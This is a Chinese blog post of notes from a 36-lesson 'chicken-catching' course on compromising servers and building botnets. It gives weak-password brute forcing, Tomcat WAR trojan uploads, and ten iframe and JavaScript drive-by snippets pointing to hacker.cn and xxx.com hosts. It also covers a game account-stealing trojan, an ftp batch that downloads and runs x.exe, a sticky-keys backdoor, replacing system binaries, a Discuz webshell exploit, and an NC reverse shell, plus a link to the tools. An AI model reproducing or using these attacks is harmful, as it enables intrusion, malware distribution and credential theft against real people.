极品抓鸡教程36课笔记

这是一份详细的网络攻防教程,涵盖了多个步骤和技术,包括端口扫描、服务器漏洞利用、免杀环境搭建、肉鸡抓取、木马上传与执行、内网穿透等。教程详细介绍了如何通过80、8080、5900等端口拿服务器,以及1433、135、445等端口的抓鸡技巧。同时,讲解了网站挂马、数据库入侵、内网攻击和远程控制的方法。此外,还涉及到了一些基础的网络安全防御知识。
部署运行你感兴趣的模型镜像

 

1.第一课
简单系统介绍 常见入侵端口:3389 4899 5900 1433 21 23 135 445
-----------------------------------------------------------------
2.第二课: 80和8080端口拿服务器
step1:使用S扫描器,扫描8080或80端口,保存ip地址ips.txt。
step2:打开 Apache Tomcat Crack工具,-----“设置”-----“导入己扫IP”-----“点导入(ips.txt)”-----“开始”
step3:寻找类似这样的url:http://ip:8080/manager/html
    以下地址为路由器地址,无用。
    url:http://ip:8080
step4:打开网址:http://ip:8080/manager/html,找到上传点,上传木马(webdax.war),木马上传成功即可获得shell.(木马须免杀)
-----------------------------------------------------------------
第3课:5900抓鸡(空口令,现在一般不会存在了)
step1:s扫描器扫5900IP段
step2:打开5900扫描器,输入扫描段
step3:点“开始”,等待扫描结果,带有VULNERABLE字符的即可连接
-----------------------------------------------------------------
第4课:刷钻教程
现在己无法刷钻,
原理:抓到肉鸡后,上传软件“路由器密码查看器”查看到密码,将肉鸡设为代理,此时操作自己的机器不是操作肉鸡的机器,然后登陆刷钻网站,通过宽带支付的方式支付QQ会员什么的。
-----------------------------------------------------------------
第5课:1433抓鸡 
原理:弱口令
-----------------------------------------------------------------
第6课:135抓肉鸡
原理:弱口令
-----------------------------------------------------------------
第7课:免杀环境搭建
就是虚拟机安装,杀毒软件安装
-----------------------------------------------------------------
第8课:网吧上线教程
使用内网端口自动映射工具,也可以使用向日葵等工具。
-----------------------------------------------------------------
第9课:刷钻,略
-----------------------------------------------------------------
第10课:木马手工捆绑
-----------------------------------------------------------------
第11课:给服务器开3389
可以上传一个批处理执行:
------------------------------------------------
echo Windows Registry Editor Version 5.00>>3389.reg 
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>3389.reg 
echo "fDenyTSConnections"=dword:00000000>>3389.reg 
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.reg 
echo "PortNumber"=dword:00000d3d>>3389.reg 
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>3389.reg 
echo "PortNumber"=dword:00000d3d>>3389.reg 
regedit /s 3389.reg 
del 3389.reg
------------------------------------------------
第12课:网马介绍 略
-----------------------------------------------------------------
第13课:网站挂马实例
------------------------------------------------
1.在自己网站挂马
2.在他人网站挂马
3.框架网马代码
<iframe src="网马地址" width="宽" height="高" scrolling="滚动条" frameborder="边框"></iframe>
例:<iframe src="http://hacker.cn/webshell.html" width="0" height="0" scrolling="no" frameborder="0"></iframe>
可以查看10种挂马方式。
----------------------------------------------------------------------------------------

一:框架挂马

<iframe src=地址 width=0 height=0></iframe> 

二:js文件挂马

首先将以下代码
document.write("<iframe width='0' height='0' src='地址'></iframe>");
保存为xxx.js,
则JS挂马代码为
<script language=javascript src=xxx.js></script> 

三:js变形加密

<SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt></script> 
muma.txt可改成任意后缀
四:body挂马

<body onload="window.location='地址';"></body>

五:隐蔽挂马

top.document.body.innerHTML = top.document.body.innerHTML + '\r\n<iframe src="http://www.xxx.com/muma.htm/"></iframe>';

六:css中挂马

body { 
background-image: url('javascript:document.write("<script src=http://www.XXX.net/muma.js></script>")')} 

七:JAJA挂马

<SCRIPT language=javascript> 
window.open ("地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1"); 
</script>

八:图片伪装

<html>
<iframe src="网马地址" height=0 width=0></iframe>
<img src="图片地址"></center>
</html>

九:伪装调用:

<frameset rows="444,0" cols="*">
<frame src="打开网页" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0">
<frame src="网马地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0">
</frameset>

十:高级欺骗

<a href="http://www.163.com(迷惑连接地址,显示这个地址指向木马地址)" onMouseOver="www_163_com(); return true;"> 页面要显示的内容 </a>
<SCRIPT Language="JavaScript">
function www_163_com ()
{
var url="网马地址";
open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10");
}
----------------------------------------------------------------------------------------
第14课:网站挂马常见问题
------------------------------------------------
网站的常见默认页面有;

index.htm Default.htm index.html Default.html index.asp Default.asp index.php Default.php
网站常见目录
web目录或wwwroot目录

第15课:1521全自动抓鸡教程
------------------------------------------------
oracle 默认的端口号是1521,弱口令爆破抓肉鸡
------------------------------------------------
第16课:简单的指定IP攻击
------------------------------------------------
利用远控软件对目标IP实施攻击,略。
------------------------------------------------
第17课:Radmin4899抓鸡
------------------------------------------------
基本利用弱口令扫4899,现在估计已经失效。无法扫到空口令了。
步骤:

1。安装RADMIN影子版3.2

2。扫4899端口

3。扫4899空口令

4。用RADMIN影子版3.2连接

5。传马运行
------------------------------------------------
-------------------------------------------------------------------------------------
第18课:入侵网站挂马实例
------------------------------------------------
工具:

1.网马生成器

2.ASP木马

3.自已的木马

4.空间域名各一个

入侵步骤:

1.制作自已的网马

2.进入动网后台上传ASP木马提权

3.在入侵的网站上框架自已的网马地址

<Iframe   src="http://www.xxx.com/xx.htm"   width="0"   height="0"  scrolling="no"   frameborder="0"></Iframe> 

4.测试

总结:将自己的exe木马上传到自己的网站,并使用见多马生成器生成网马,控制服务器后插入主页框架木马,别人访问即可中马,远控也会上线。

-------------------------------------------------------------------------------------
第19课:DNF盗号教程
------------------------------------------------
DNF盗号教程

工具:
1.空间域名各一个[免费空间可能收不到信]

2.DNF盗号马一个

操作步骤:

将ASP收信文件上传到空间,根据收信文件的地址配置好木马

上传DNF木马,运行,对方会自动退出DNF游戏,当对方重新登陆DNF游戏时,密码会发致我们提前设好的信箱里

然后我们登陆收信后台,查看密码

箱子地址:域名后面加上/lin.asp

后台地址:域名后面加上/index.asp

总结:配置一个自己的ASP网站,用DNF盗号器升成木马,发信地址填箱子地址(就是盗号后发送用户名密码到箱子地址),然后自己登陆后台地址,即可管理

-------------------------------------------------------------------------------------
第20课:2967批量抓鸡教程
------------------------------------------------
2967是诺顿以前版本的一个漏洞

安装后会默认开放2967端口
诺顿的一个溢出洞,原理就是批量扫描,然后对其进行溢出,传马批量获得肉鸡 

------------------------------------------------

第21课:3306批量抓鸡教程

------------------------------------------------
3306是装有MYSQL数据库默认开放的端口,hscan爆破,关键在于字典,过程略。
-------------------------------------------------------------------------------------
第22课:2009最新网马演示实例
------------------------------------------------
step1:使用网马生成器生成网马,。
step2:将网站发给别人
step3:别人点击后中马,例子中,是在一个在线聊天室里面发送链接。很快别人就中马了。
-------------------------------------------------------------------------------------
第23课:1433全自动批量抓鸡二
------------------------------------------------
弱口令
1433端口是SQL Server默认的端口,SQL Server服务使用两个端口:TCP-1433、UDP-1434。其中1433用于供SQL Server对外提供服务,1434用于向请求者返回SQL Server使用了哪个TCP/IP端口。

-------------------------------------------------------------------------------------
第24课:开启内网肉鸡的3389
------------------------------------------------
工具:1. lcx.exe 2.3389.bat
原理:在肉鸡运行lcx.exe加参数,使肉鸡3389端口连接至本机51端口,利用本机51端口进行监听3388端口,通过访问本机3388端口进行连接肉鸡3389端口
step1:通过各咱方法远程连接目标主机,例如:telnet,命令行上传。lcx.exe 和3389.bat,执行3389.bat.
step2:通过telnet,执行:lcx.exe -slave 本机外网IP 51 肉鸡内网IP 3389,本例:lcx.ext -slave 10.1.1.1 51 10.1.1.3 389
step3:在本机执行:执行:lcx.exe -listen 51 3388
step4:使用远程连接,执行:127.0.0.1:3388。即可远程桌面目标主机。(内网用户需要映射51端口到本机)
-------------------------------------------------------------------------------------
第25课(无此课),第26课:批量拿站入侵FTP空间
------------------------------------------------
工具是自动抓鸡的,没看懂。
-------------------------------------------------------------------------------------
第27课:3306肉鸡争夺
------------------------------------------------
思路:3306爆破入侵肉鸡后,注销用户,命令:logoff ID,查看在线用户命令:query user,替换以下文件

用ping.exe替换以下文件
%systemroot%\system32\net.exe

%systemroot%\system32\net1.exe

%systemroot%\system32\ftp.exe

%systemroot%\system32\edit.com

%systemroot%\system32\attrib.exe

%systemroot%\system32\sc.exe

%systemroot%\system32\at.exe

可以保存为批处理,直接一键执行。

copy %systemroot%\system32\ping.exe %systemroot%\system32\net.exe /y

copy %systemroot%\system32\ping.exe %systemroot%\system32\net1.exe /y

copy %systemroot%\system32\ping.exe %systemroot%\system32\ftp.exe /y

copy %systemroot%\system32\ping.exe %systemroot%\system32\edit.com /y

copy %systemroot%\system32\ping.exe %systemroot%\system32\attrib.exe /y

copy %systemroot%\system32\ping.exe %systemroot%\system32\sc.exe /y

copy %systemroot%\system32\ping.exe %systemroot%\system32\at.exe /y
-------------------------------------------------------------------------------------
第28课:陕西无跳板刷钻操作步骤
----------------------------------------------------------------
略。
----------------------------------------------------------------
第29课:80和8080拿服务器二
----------------------------------------------------------------
step1:入侵8080服务器,拿到shell,在shell中,命令行中输入:
copy %systemroot%\system32\cmd.exe %systemroot%\system32\sethc.exe /y 
copy %systemroot%\system32\sethc.exe %systemroot%\system32\dllcache\sethc.exe /y
建立后门,
step2:3389连接,按5次shift,启动后门,在CMD中,输入命令:explorer,调用桌面,接着就可以操作桌面了。
-------------------------------------------------------------------------------------
第30课:asp注入拿站
----------------------------------------------------------------
搜索:inurl:asp?id=92

使用“旁注WEB综合检测程序”注入网站,猜解用户名密码,然后登陆。

--------------------------------------------------------------------------------------
第31课:DZ 7[1].1 7.2最新漏洞的利用
----------------------------------------------------------------
step1:搜索 intitle:Powered by discuz 7.1 
注册一个账号,进入后,复制论坛地址,例如:action="http://bbs.jksing.com/bbs/misc.php"修改工具中,dz.htm,改成例子中的地址。
打开dz.hm,点提交,复制界面上的一句话木马forumdata/cache/usergroup_01.php,前面加了论坛地址,例如http://bbs.jksing.com/forumdata/cache/usergroup_01.php,此为一句话木马,连接一句话木马,使用客户端 ,lanker.htm,复制木马地址进去,上传后门木马上去,即可获得shell.密码eye
--------------------------------------------------------------------------------------
第32课:445抓鸡
----------------------------------------------------------------
step1:开启扫鸡的服务
服务批处理;
------------------------------------------
@echo off
color c
title 全自动开启服务
echo.
echo 提示:开始扫描前需要检测并开启以下服务,请稍等....
echo.
sc config LmHosts start= auto
sc config RpcLocator start= auto
sc config NtlmSsp start= auto
sc config lanmanserver start= auto
sc config SharedAccess start= disabled
net start LmHosts 2>nul
net start RpcLocator 2>nul
net start NtlmSsp 2>nul
net start lanmanserver 2>nul
net stop SharedAccess >nul 2>nul
echo.
echo 开启需要的服务成功完毕!
pause
-----------------------------------------

step2:架设一个HTTP或是FTP服务,工具提供两种传马方式
step3:选择IP段
step4:.扫描 
总结:使用445溢出漏洞自动化。
                         
第33课:2967抓鸡
----------------------------------------------------------------
和36课差不多。以下为传马批处理
----------------------------------------------------------------
net stop sharedaccess
echo open 113.2.136.130> cmd.txt
echo 123>> cmd.txt
echo 123>> cmd.txt
echo binary >> cmd.txt
echo get x.exe>> cmd.txt
echo bye >> cmd.txt
ftp -s:cmd.txt
x.exe
x.exe
del cmd.txt. /q /f
exit
exit
----------------------------------------------------------------
----------------------------------------------------------------
第34课:上传漏洞批量拿WEBSHELL
----------------------------------------------------------------
step1:使用挖掘机V1.1搜索,漏洞利用页面:/upfile_other.asp
step2:上传图片,上传小马然后上传大马(打开本地上传工具,修改源代码,替换成要上传的页面地址,前面一个选图片,后面一个选小马或大马)
----------------------------------------------------------------
第35课:5900加X-scan入侵服务器
----------------------------------------------------------------
step1:s扫描器扫5900,保存ip.txt
step2:xscan.exe扫描弱口令,VNClink.exe连接。
----------------------------------------------------------------
第36课:2967手动抓服务器
----------------------------------------------------------------
原理:利用诺顿服务器版漏洞NC反弹监听获取CMD-SHELL
step1:S扫描器扫描2967端口

step2:配置程序(配置scan.bat ,将里面的IP地址改成自己的外网IP,打开“开始.bat”,等待上线)

step3:运行NC监听程序,扫描漏洞主机

内网要映射2967和56端口到本机
----------------------------------------------------------------
总结:大致看一下过程,学习里面的思路,有些漏洞还是可以找到的。

用到的工具:

链接:https://pan.baidu.com/s/12qR0CQ_CRJZAz_vBT6aVUw 
提取码:hbby 
 

 

您可能感兴趣的与本文相关的镜像

ACE-Step

ACE-Step

音乐合成
ACE-Step

ACE-Step是由中国团队阶跃星辰(StepFun)与ACE Studio联手打造的开源音乐生成模型。 它拥有3.5B参数量,支持快速高质量生成、强可控性和易于拓展的特点。 最厉害的是,它可以生成多种语言的歌曲,包括但不限于中文、英文、日文等19种语言

评论 2
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值